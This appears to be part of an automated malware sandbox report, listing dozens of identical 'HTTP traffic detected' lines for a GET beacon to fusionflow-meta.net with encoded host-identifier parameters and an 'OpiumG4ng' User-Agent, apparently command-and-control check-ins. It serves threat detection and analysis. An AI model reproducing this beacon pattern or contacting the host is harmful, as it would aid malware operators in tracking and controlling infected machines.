Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
